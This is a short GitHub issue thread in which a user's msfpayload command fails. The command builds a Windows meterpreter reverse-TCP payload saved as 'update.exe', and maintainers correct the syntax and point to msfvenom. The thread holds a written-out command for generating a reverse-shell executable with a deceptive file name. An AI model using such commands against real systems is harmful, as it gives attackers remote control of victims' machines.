### ISSUE TITLE
 msfpayload not working ....

### ISSUE THREAD

**Issue by levani1337** [rapid7/metasploit-framework#5440]
root@kali:~# msfpayload windows/meterpeter/reverse_tcp LHOST=ip address :PORT=port x > /root/Desktop/update.exe
[!] ************************************************************************
[!] *               The utility msfpayload is deprecated!                  *
[!] *              It will be removed on or about 2015-06-08               *
[!] *                   Please use msfvenom instead                        *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *
[!] ************************************************************************
Invalid payload: windows/meterpeter/reverse_tcp

please help :)

**Comment by kernelsmith** [comment]
@levani1337 we don't use github issues for support requests, try irc freenode #metasploit or the rapid7 community site.  As the message says, use msfvenom instead.  Also there shouldn't be a ':' in front of PORT and PORT should be LPORT, should be LHOST=192.168.1.1 LPORT=4444

**Comment by void-in** [comment]
@kernelsmith You correctly closed this. Just so anyone knows if they ever encounter this, the invalid payload error is because he is using meterpeter which should rather be meterpreter.
